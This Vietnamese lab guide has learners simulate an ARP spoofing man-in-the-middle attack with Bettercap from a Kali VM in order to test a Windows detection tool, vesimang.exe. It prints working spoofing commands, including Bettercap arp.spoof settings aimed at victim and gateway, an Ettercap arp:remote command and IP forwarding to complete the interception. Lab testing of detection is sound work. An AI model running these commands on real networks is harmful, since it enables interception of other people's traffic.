Download : CyberGuardv1 https://drive.google.com/drive/folders/1KCDJblGIXn2oUNEqo1Zoo5cinWZ-qsbn?usp=sharing

Test Lab Security365 – Thử nghiệm phát hiện ARP Spoofing

Mục tiêu: Mô phỏng tấn công MITM bằng Bettercap để phát hiện hacker qua tool vesimang – không phải để chụp mật khẩu hay nghe lén.

1. Chuẩn bị

Máy nạn nhân (Windows thật – chạy vesimang.exe)

Cài Npcap (bật WinPcap Compatible Mode khi cài).
Chạy vesimang.exe bằng Run as Administrator.
Nhấn Unlock Gateway ARP (nếu trước đó đã Lock).
Nhấn Start ARP Monitor và giữ cửa sổ mở.

Máy tấn công (Kali Linux VM – chế độ Bridge)

(LMS: https://elearning.security365.vn)

Đặt Network Adapter = Bridged (cùng VLAN/subnet với Windows).
Lấy IP: ip -4 a (Ví dụ: 192.168.1.50)
Xác định gateway: ip route | grep default (Ví dụ: 192.168.1.1)
Lấy IP của máy nạn nhân (Windows): arp -an (Hoặc ping trước để hiện ARP)

2. Chạy Bettercap

sudo bettercap -iface eth0

Trong console Bettercap:

set arp.spoof.targets <IP_nạn_nhân>   # Ví dụ: 192.168.1.23
set arp.spoof.internal true           # Đầu độc cả victim và gateway
arp.spoof on
net.probe on

💡 Mẹo: Nếu card mạng không phải eth0, dùng:

ip link

để xem tên đúng (có thể là ens33, enp0s3, v.v.).

3. Kết quả mong đợi trên vesimang.exe

Bạn sẽ thấy popup cảnh báo và dòng vàng trong bảng với một hoặc nhiều thông báo:

Gateway MAC changed
IP <victim/gateway> switched MAC
Gratuitous ARP for gateway detected
(Có thể) High ARP rate from <MAC>

4. Nếu không thấy cảnh báo, kiểm tra:

Kali đang NAT → đổi sang Bridged.
Kiểm tra subnet: ipconfig # trên Windows ip -4 a # trên Kali
Chạy vesimang.exe bằng Admin, kiểm tra Npcap.
Tắt chế độ AP/Wi-Fi Isolation trên router.
Kiểm tra trạng thái Bettercap: arp.spoof status
Thử Ettercap: sudo ettercap -T -M arp:remote /<IP_nạn_nhân>/ /<IP_gateway>/
Kiểm tra đúng tên iface: ip link
(Không bắt buộc) Bật IP forwarding để MITM hoàn chỉnh: sudo sysctl -w net.ipv4.ip_forward=1